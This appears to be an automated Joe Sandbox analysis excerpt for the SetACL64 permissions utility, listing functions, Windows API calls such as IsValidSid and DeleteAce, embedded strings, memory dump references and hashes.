_Getctype.LIBCPMT ref: 00007FF68683A8BC
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF68683A94C
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF68683A996
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF68683A9BB
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF68683A9E5
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF68683AA6E

Strings

bad locale name, xrefs: 00007FF68683A96F

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$GetctypeLocinfo::_Locinfo_ctor
String ID: bad locale name
API String ID: 249287498-1405518554
Opcode ID: 8bc982661b0ee05dfb2898125f394b4b40cc44dd271d2c8eedadb7c000856f72
Instruction ID: 0362ff50ef98fb21abde8038824d2edfecb0dcd294d6f109a18a45e4b1812ec6
Opcode Fuzzy Hash: 8bc982661b0ee05dfb2898125f394b4b40cc44dd271d2c8eedadb7c000856f72
Instruction Fuzzy Hash: 7F718DA2B19A81C9FB15DF65D9502BC3364FF54744F080039DF8DA3A96DE3AE952C324

Function 00007FF686856970 Relevance: 15.3, APIs: 10, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a5f5edd017b658e983cfd53b7e8145c4734415c703908048787467d75527855
Instruction ID: 37cde0b8ee0a8e9ebdae20085242ca243395c0f755390ccc7e8776fdc38bdca3
Opcode Fuzzy Hash: 7a5f5edd017b658e983cfd53b7e8145c4734415c703908048787467d75527855
Instruction Fuzzy Hash: D5B16DB2A15B81C9EB14CF64E8487AD33A5FF48B88F504029EF4D47A59DF39D890C354

Function 00007FF686859830 Relevance: 15.2, APIs: 10, Instructions: 188COMMON

Download Yara Rule

APIs

GetAclInformation.ADVAPI32 ref: 00007FF68685989B
GetLastError.KERNEL32 ref: 00007FF6868598A5
GetAce.ADVAPI32 ref: 00007FF6868598FA
EqualSid.ADVAPI32 ref: 00007FF686859949
DeleteAce.ADVAPI32 ref: 00007FF686859974
IsValidSid.ADVAPI32 ref: 00007FF68685999F
GetLastError.KERNEL32 ref: 00007FF6868599DA
IsValidSid.ADVAPI32 ref: 00007FF686859A31
GetLastError.KERNEL32 ref: 00007FF686859ADF
GetLastError.KERNEL32 ref: 00007FF686859AF2

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: ErrorLast$Valid$DeleteEqualInformation
String ID:
API String ID: 439278688-0
Opcode ID: 02abaca1715827c988373279d1206fa39163a6e830349d42f3409750fdde2c61
Instruction ID: 344a6eff489a6a41200e9fdbeae6a458f7b893de6cad95c91f516e73a36f76fd
Opcode Fuzzy Hash: 02abaca1715827c988373279d1206fa39163a6e830349d42f3409750fdde2c61
Instruction Fuzzy Hash: CE816BA1A0C6C6CAEE618B26954937967A1FF84B84F080439DA4ED7791DF3EEC50C720

Function 00007FF686859B10 Relevance: 15.2, APIs: 10, Instructions: 168COMMON

Download Yara Rule

APIs

IsValidSid.ADVAPI32 ref: 00007FF686859B9F

Part of subcall function 00007FF68685EC20: IsValidSid.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00007FF686860410), ref: 00007FF68685EC37
Part of subcall function 00007FF68685EC20: GetLengthSid.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00007FF686860410), ref: 00007FF68685EC44
Part of subcall function 00007FF68685EC20: CopySid.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00007FF686860410), ref: 00007FF68685EC68

IsValidSid.ADVAPI32 ref: 00007FF686859BC2
IsValidSid.ADVAPI32 ref: 00007FF686859BD4
EqualSid.ADVAPI32 ref: 00007FF686859BE5
IsValidSid.ADVAPI32 ref: 00007FF686859C1A
IsValidSid.ADVAPI32 ref: 00007FF686859C5A
IsValidSid.ADVAPI32 ref: 00007FF686859C7D
IsValidSid.ADVAPI32 ref: 00007FF686859C8F
EqualSid.ADVAPI32 ref: 00007FF686859CA0
IsValidSid.ADVAPI32 ref: 00007FF686859CD5

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: Valid$Equal$CopyLength
String ID:
API String ID: 1685539899-0
Opcode ID: 3b1f6e0476a15e4dbeff593321d0a39690655f45c3396d74e8fe94f401111051
Instruction ID: a4dd4278073af2a013df23084189b77d362f12a0b95b607b2d94aac1d75636ae
Opcode Fuzzy Hash: 3b1f6e0476a15e4dbeff593321d0a39690655f45c3396d74e8fe94f401111051
Instruction Fuzzy Hash: F6614BA2A0968AC5EF559B62955873963E1FF84BC4F094039DD4FC7694DF2AEC41C320

Function 00007FF6868350C0 Relevance: 14.5, APIs: 6, Strings: 2, Instructions: 468COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68683570C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686835712
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686835718
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68683571E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686835724
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686835787

Part of subcall function 00007FF686860C18: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF686860C35
Part of subcall function 00007FF686860C18: std::locale::_Setgloballocale.LIBCPMT ref: 00007FF686860C58
Part of subcall function 00007FF686860C18: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF686860CF3

Strings

\\?\, xrefs: 00007FF68683538D
\\?\UNC\, xrefs: 00007FF6868352A0

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Lockitstd::_$Lockit::_Lockit::~_Setgloballocalestd::locale::_
String ID: \\?\$\\?\UNC\
API String ID: 3857612545-3019864461
Opcode ID: 80f86e82870b07e6d5627ecd3545ff3dece0f910a388d86736f9a77694643264
Instruction ID: ec64b29624004c076bbc19b5d94b6a7e40fa9581379ff9746ff67b21c99c93ac
Opcode Fuzzy Hash: 80f86e82870b07e6d5627ecd3545ff3dece0f910a388d86736f9a77694643264
Instruction Fuzzy Hash: 7A12BDE2B14A52C0EF158B65E6483AD2362BF44B98F404139CE1D977D8DF7EE844C361

Function 00007FF686840CC0 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 350COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868410F8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868410FE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686841104
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68684110A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686841110
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868411F4

Strings

No trustee specified., xrefs: 00007FF686840D24
AddTrustee, xrefs: 00007FF686840D52

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: AddTrustee$No trustee specified.
API String ID: 3668304517-2850116058
Opcode ID: fb94bdf829771a45d73d4169ee65a2f39625c9cf73fdf6b67dd04f57a629b6a1
Instruction ID: 0172597cc770834c206db564e413adbbf54036ed6a53a0ed8c9f64ea8fd70147
Opcode Fuzzy Hash: fb94bdf829771a45d73d4169ee65a2f39625c9cf73fdf6b67dd04f57a629b6a1
Instruction Fuzzy Hash: DDE181B2B19782C1EF148B68D4883AD6366FF44784F505139D78C87AA9DFBEE890C710

Function 00007FF686838C30 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 318COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF686838F2C
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF686838F32
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF686838F38
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF686838FAE
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF686838FF6

Strings

true, xrefs: 00007FF686838DCA
false, xrefs: 00007FF686838D0E

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: Concurrency::cancel_current_task$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: false$true
API String ID: 164343898-2658103896
Opcode ID: f445c541dcabc8c76a2eb441bad9b69acf557a9bd182a87f89098410cebb741f
Instruction ID: ae97e9e7d1953d2bce26382807daa9675c03813459d1763757b9afafb3f1c7ac
Opcode Fuzzy Hash: f445c541dcabc8c76a2eb441bad9b69acf557a9bd182a87f89098410cebb741f
Instruction Fuzzy Hash: 56D17862B19A42CAEB10DFA1D5442AD33A5FF48788F054139DF4CA7B89EF3AD916C314

Function 00007FF686860320 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 252COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6868608C0: IsValidSid.ADVAPI32(?,?,?,00007FF68686034D,?,?,?,?,?,00007FF68685F8CF), ref: 00007FF6868608E2
Part of subcall function 00007FF6868608C0: GetLengthSid.ADVAPI32(?,?,?,00007FF68686034D,?,?,?,?,?,00007FF68685F8CF), ref: 00007FF6868608F3

IsValidSid.ADVAPI32(?,?,?,?,?,00007FF68685F8CF), ref: 00007FF686860379
IsValidSid.ADVAPI32 ref: 00007FF68686038C
EqualSid.ADVAPI32 ref: 00007FF68686039D
IsValidSid.ADVAPI32(?,?,?,?,?,00007FF68685F8CF), ref: 00007FF6868603FE
IsValidSid.ADVAPI32(?,?,?,?,?,00007FF68685F8CF), ref: 00007FF686860549
IsValidSid.ADVAPI32 ref: 00007FF68686055C
EqualSid.ADVAPI32 ref: 00007FF68686056E

Strings

unordered_map/set too long, xrefs: 00007FF686860628

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: Valid$Equal$Length
String ID: unordered_map/set too long
API String ID: 2183326427-306623848
Opcode ID: ad27f92fef91cd753ab91c311a8dad5f0718926ff1c6d6db717cf738553d2b84
Instruction ID: 01e13e3b29bab320d22077e11ca26de59146cf1b724f28dfb404a23af3215cd2
Opcode Fuzzy Hash: ad27f92fef91cd753ab91c311a8dad5f0718926ff1c6d6db717cf738553d2b84
Instruction Fuzzy Hash: 29A1E362A29B45C1EE608F12E6483796365FF88B84F184639DF8D97751DF3EE8A0C314

Function 00007FF686887748 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 186COMMON

Download Yara Rule

APIs

LoadStringW.USER32 ref: 00007FF6868877A6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868878BA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68688790A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868879EB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686887A3B

Strings

Operating system error message: , xrefs: 00007FF686887933
SetACL error message: , xrefs: 00007FF6868877FE
SetACL finished with error(s): , xrefs: 00007FF686887771

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$LoadString
String ID: Operating system error message: $SetACL error message: $SetACL finished with error(s):
API String ID: 498717675-3876775778
Opcode ID: 5ce873107c147e58fbec8a04b54c5fd4bfe3e96f955e4566f1b3ca94a313b483
Instruction ID: cacafaff8aef16aef4453ca37b0079115f82df94c3156b3a4bae7fc55b23598f
Opcode Fuzzy Hash: 5ce873107c147e58fbec8a04b54c5fd4bfe3e96f955e4566f1b3ca94a313b483
Instruction Fuzzy Hash: 0E81B9A2A59BC6C5EB209F34D8443ED2361FF45788F809139D74C9B656DF6EDA84C310

Function 00007FF6868386B0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 169COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF686838719
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF686838764
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6868387F4
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF686838846
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF68683886B
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF686838895
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF68683891E

Strings

bad locale name, xrefs: 00007FF686838817

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_Locinfo_ctor
String ID: bad locale name
API String ID: 3718194943-1405518554
Opcode ID: 1a7bf999381c07af3242a3cc31933243c0f84e1edb9a9b3fcdc9fb87e6ad8860
Instruction ID: 5edb164053f14823ef009b0b5fbfb0295dba3cd7d5b04dfe628d906d343e664f
Opcode Fuzzy Hash: 1a7bf999381c07af3242a3cc31933243c0f84e1edb9a9b3fcdc9fb87e6ad8860
Instruction Fuzzy Hash: 27615CA2B1AA41C9EB15DF65D5402BC33B4FF84744F080039DB4D9BA55DE3AE951D324

Function 00007FF686838F40 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF686838FAE
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF686838FF6
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF68683909D
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6868390E6
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF68683910B
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF686839135
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6868391BE

Strings

bad locale name, xrefs: 00007FF6868390C0

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_Locinfo_ctor
String ID: bad locale name
API String ID: 3718194943-1405518554
Opcode ID: 1a3bb911b4edc9c961d994df47ad412ba050329201994a1f2ddff9c2ca2b1207
Instruction ID: b18d9d6a90ea41b88493a7cd670c6ed15ab84ebc6e822d434017d7460284c509
Opcode Fuzzy Hash: 1a3bb911b4edc9c961d994df47ad412ba050329201994a1f2ddff9c2ca2b1207
Instruction Fuzzy Hash: 73717BB2A19A41C9EF15DF61D5542BC23A4FF44748F080039DB4DA7A99DF3EE816C324

Function 00007FF686834D30 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 164COMMON

Download Yara Rule

APIs

GetComputerNameW.KERNEL32 ref: 00007FF686834D91
GetLastError.KERNEL32 ref: 00007FF686834D9F

Part of subcall function 00007FF68683BF60: GetLastError.KERNEL32 ref: 00007FF68683BFCE

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686834F9B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686834FA1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686834FA7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686834FAD

Strings

GetComputerNameAPIWrapper, xrefs: 00007FF686834E0F
Querying the computer name failed with: , xrefs: 00007FF686834DBD

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ErrorLast$ComputerName
String ID: GetComputerNameAPIWrapper$Querying the computer name failed with:
API String ID: 3471954800-1594087890
Opcode ID: 065ba2d2fcd18019d0079e83448bdb250b984e5464f0ba45951be90b2cb0b2c0
Instruction ID: 38ec03f8199a33b3668a6a558b15845d0e078863b9bd3636afb95cb188205440
Opcode Fuzzy Hash: 065ba2d2fcd18019d0079e83448bdb250b984e5464f0ba45951be90b2cb0b2c0
Instruction Fuzzy Hash: 0551C9A2F19782C1EA109B24E5453AD6361FF857A4F505339EA5C83BD9DFBDE880C710

Function 00007FF6868841C8 Relevance: 13.8, APIs: 9, Instructions: 273fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF686883EF8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF686883F39
Part of subcall function 00007FF686883EF8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF686883FB9
Part of subcall function 00007FF686883EF8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF68688400D
Part of subcall function 00007FF686883EF8: _get_daylight.LIBCMT ref: 00007FF686884065

CreateFileW.KERNEL32 ref: 00007FF6868842CE
CreateFileW.KERNEL32 ref: 00007FF68688431E
GetLastError.KERNEL32 ref: 00007FF68688434E
GetFileType.KERNEL32 ref: 00007FF686884363
GetLastError.KERNEL32 ref: 00007FF68688436D
CloseHandle.KERNEL32 ref: 00007FF6868843A0
CloseHandle.KERNEL32 ref: 00007FF6868844FB
CreateFileW.KERNEL32 ref: 00007FF686884530
GetLastError.KERNEL32 ref: 00007FF68688453F

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
String ID:
API String ID: 1330151763-0
Opcode ID: b9231ba523ef921c185656f1683b76f63ef61d7596155f01418a651d74091a53
Instruction ID: 71de193b9a12ce8679becf87757b71345605cb02f8b81f55450ee24771fe82b0
Opcode Fuzzy Hash: b9231ba523ef921c185656f1683b76f63ef61d7596155f01418a651d74091a53
Instruction Fuzzy Hash: 3DC1B3B3B28A46C6EB10CF65D4806AD3761FB89B98F100329DA2E977E5CF39D851C310

Function 00007FF68685F660 Relevance: 13.7, APIs: 9, Instructions: 247COMMON

Download Yara Rule

APIs

IsValidSid.ADVAPI32 ref: 00007FF68685F6F8
IsValidSid.ADVAPI32 ref: 00007FF68685F70B
EqualSid.ADVAPI32 ref: 00007FF68685F71C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685F9A6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF68685F9AC

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd

Similarity

API ID: Valid_invalid_parameter_noinfo_noreturn$Equal
String ID:
API String ID: 2161274208-0
Opcode ID: a5c13f6e99239f99eb93357bfcbca789068a21bedda29611b1cdf87a38f81f85
Instruction ID: 3034ee1e8eb50bf50f096ccaf1652248657bcf6ff761f882f1812c8893207ebd
Opcode Fuzzy Hash: a5c13f6e99239f99eb93357bfcbca789068a21bedda29611b1cdf87a38f81f85
Instruction Fuzzy Hash: 2491C1A2A19A82D1EA209F11D54837A63A1FF85BD4F544239DA5E87798DF3EEC40C720

Function 00007FF686865B20 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 313COMMONLIBRARYCODE

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF686865B7C

Part of subcall function 00007FF686867D80: _GetEstablisherFrame.LIBVCRUNTIME ref: 00007FF686867DB5
Part of subcall function 00007FF686867D80: __GetUnwindTryBlock.LIBCMT ref: 00007FF686867DC3
Part of subcall function 00007FF686867D80: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF686867DE8

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF686865C54
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF686865E9A
_GetEstablisherFrame.LIBVCRUNTIME ref: 00007FF686865EEC

Strings

csm, xrefs: 00007FF686865B96
csm, xrefs: 00007FF686865BFD
csm, xrefs: 00007FF686865C77

Memory Dump Source

Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true

Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
